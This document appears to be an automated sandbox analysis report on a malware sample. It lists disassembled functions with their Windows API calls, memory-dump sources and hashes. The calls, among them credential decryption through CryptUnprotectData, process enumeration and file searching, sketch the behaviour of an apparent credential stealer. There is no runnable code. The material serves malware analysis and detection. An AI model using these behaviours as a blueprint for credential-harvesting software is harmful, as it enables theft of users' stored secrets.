Function 023F7507 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 023F7514
RtlAllocateHeap.NTDLL(00000000), ref: 023F751B
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 023F7548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 023F756B
LocalFree.KERNEL32(?), ref: 023F7575

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction ID: 9ceeebba11c837cc92cbf04180d4de01cb02509163366cbfcb3e4fc155a469b6
Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction Fuzzy Hash: 36010CB5A45308BBDB10DFE8DD46F9DB779AB44B04F108146FB05AA2C0D7B0AB00CB65

Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
CloseHandle.KERNEL32(00420ACE), ref: 0041980A

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61

Function 024099F7 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02409A15
Process32First.KERNEL32(00420ACE,00000128), ref: 02409A29
Process32Next.KERNEL32(00420ACE,00000128), ref: 02409A3E
StrCmpCA.SHLWAPI(?,00000000), ref: 02409A53
CloseHandle.KERNEL32(00420ACE), ref: 02409A71

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction ID: c2dbc5e7c5e751b6bcfb8949c89767b2717ef2cbaa4c6dfc875735d7eeeba278
Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction Fuzzy Hash: 66011E75A05248EBCB20DFA5CD84BDEB7B9BB08700F00419AF50997281EB709B80CF51

Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00

Strings

,<A, xrefs: 0041398D, 00413AE4, 00413AE7

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: ,<A
API String ID: 123533781-3158208111
Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50

Function 023FE797 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 023FE809
StrCmpCA.SHLWAPI(?,004215F0), ref: 023FE859
StrCmpCA.SHLWAPI(?,004215F4), ref: 023FE86F
FindNextFileA.KERNEL32(000000FF,?), ref: 023FEF46

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID:
API String ID: 433455689-0
Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
Instruction ID: 0ab148b69e6a8c4b9463be41fccd9c657f43b494cca93d4921ca05024ba10826
Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
Instruction Fuzzy Hash: AB12DA729013289ACB18FB61DCD5EED737AAF94305F4045BEA64A660D0EF345B88CF91

Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Process32First.KERNEL32(?,00000128), ref: 0041886E
Process32Next.KERNEL32(?,00000128), ref: 00418883

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

CloseHandle.KERNEL32(?), ref: 004188F1

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: e6eae36bb9374a97c76adab8f6b270438b1d545086307427462bd1f80524a4b9
Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
Opcode Fuzzy Hash: e6eae36bb9374a97c76adab8f6b270438b1d545086307427462bd1f80524a4b9
Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5

Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: ffe1fb48d7cc34e58daaddf9534e48f58287fa7ccb4c51b52f940144535c5183
Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
Opcode Fuzzy Hash: ffe1fb48d7cc34e58daaddf9534e48f58287fa7ccb4c51b52f940144535c5183
Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9

Function 02409297 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,023F543B,40000001,00000000,00000000,?,023F543B), ref: 024092B7

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction ID: 8547efb29692fbcb0861729f397129ec2114ab3a22a846fbecc61f937fe345fa
Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction Fuzzy Hash: 5F111C74608209BFDB04CF54D884FAB33B9AF89B10F009569F9098B291D7B5E981CF60

Function 023FA477 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4A6
LocalAlloc.KERNEL32(00000040,?,?,?,023F51A5,00000000,?), ref: 023FA4B8
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4E1
LocalFree.KERNEL32(?,?,?,?,023F51A5,00000000,?), ref: 023FA4F6

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction ID: 34f12425e54a44a2d4981d409d344593a7be749925535512f892253123c2ff37
Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction Fuzzy Hash: 2011D274641309AFEB10CF64DC95FAA77B6FB88704F208049FE199B390C7B2AA40DB50

Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
memcpy.MSVCRT(?,?,?), ref: 0040A316
LocalFree.KERNEL32(?), ref: 0040A323

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61

Function 023FA517 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 023FA53B
LocalAlloc.KERNEL32(00000040,00000000), ref: 023FA55A
memcpy.MSVCRT(?,?,?), ref: 023FA57D
LocalFree.KERNEL32(?), ref: 023FA58A

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction ID: f90e85303a502c1895f7d5f1f97b7626b6cd14ce3a60a5dd33ff934932e2638e
Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction Fuzzy Hash: C7118AB8A01209EFCB04DFA4D985AAEB7B5FF89304F108559FD1597350D770AA50CFA1

Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A70F40,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00A70F40,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A70F40,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
wsprintfA.USER32 ref: 00417C47

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95

Function 023F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 023F095F
l, xrefs: 023F0966
GetProcAddress., xrefs: 023F09DC, 023F09DF, 023F09E4

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 5bfd2631c23e799908e91e5e44e04decb8d9544099f98826c94581bca3620fa0
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F1318AB6900609CFEB14CF99D880AAEBBF9FF08324F14404AD941A7325D771EA45CFA4

Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID:
API String ID: 62757014-0
Opcode ID: 31258d04424439a12f569067e4940d2fc891f11ff9f1757ae6140b7451ff642c
Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
Opcode Fuzzy Hash: 31258d04424439a12f569067e4940d2fc891f11ff9f1757ae6140b7451ff642c
Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6

Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529

Function 0240D481 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 0240D486

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529

Function 0241D9AB Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
Instruction ID: 775a468b28aeb69567145bb0be1ec2203d1d4745b3c93fe27659d05ddd7522ad
Opcode Fuzzy Hash: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
Instruction Fuzzy Hash: 2182D1B5A00F448FD765CF29C880B93B7E1BF8A300F548A2ED9EA8B751DB30A545CB50

Function 0245FFEF Relevance: .7, Instructions: 700COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
Instruction ID: 2bcf4f3374857742c4395d19d254c600bfcd9af03afa7e154a2233e9242b32cc
Opcode Fuzzy Hash: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
Instruction Fuzzy Hash: DA320571E006158FDB14CF68C8887BEB7B2FF85314F18922AD459AB391D7749982CB92

Function 024382DF Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
Instruction ID: d0a855cef85b944b71df4da412df52415c466c8997b3807d487dc736c6660c8a
Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
Instruction Fuzzy Hash: 7C42AF716046418FC726CF19C494726FBE2BF8D314F288A6FE4868B792D775E886CB50

Function 0246A08F Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
Instruction ID: 63c2cc827ed21a9e7cc4483247f0d16095995145b7165d6e015aa36097359b33
Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
Instruction Fuzzy Hash: B002E671E006268FCB11CF79C8846BFB7A2AF99354F15831BE855B7340D771AD828B91

Function 02435B2F Relevance: .4, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
Instruction ID: 5104c9bb7190df28e80aa1a6e1282a0b59ae46f0fd2e99e0c239151e01e11465
Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
Instruction Fuzzy Hash: 7EF179A210D6914BC71E8A1584F08BD7FD39BAD104F4E8AADECD70F383D920DA01DB61

Function 0247A76F Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
Instruction ID: 8dd0d5e8b57687106d4cca24aa46f0cc039c5fe7ac522da269ccf9b59d3b1b9e
Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
Instruction Fuzzy Hash: 68D184B3F11A294BEB08CE99CC913ADB6E2EBD8350F59413ED916E7381D6B85D0187D0

Function 0244AD0F Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
Instruction ID: 628d76cd7a70cf03f3691141939516db7477cdaa6e61b9867fd3057c423c7fb0
Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
Instruction Fuzzy Hash: B9026974E006598FCB16CFA8C4905EDBBB6FF89310F54815AE8996B355CB30AA91CB90

Function 0244B1CF Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
